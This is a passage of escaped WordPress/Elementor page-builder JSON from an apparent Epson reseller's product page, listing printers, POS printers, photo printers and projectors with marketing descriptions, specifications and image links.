src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><br><br>\\n\\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 40 ppm<\\/li>\\n \\t<li>Epson iPrint<\\/li>\\n \\t<li>Ethernet<\\/li>\\n \\t<li>4 optional cassette trays<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"75\",\"right\":\"75\",\"bottom\":\"75\",\"left\":\"75\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":\"-2\",\"bottom\":\"-2\",\"left\":\"-2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4ede29a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/h4><p><br \\/><img class=\\\"wp-image-2431 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"175\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"7bcc969\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"561cb4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":22},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L850 Printer\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2432 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 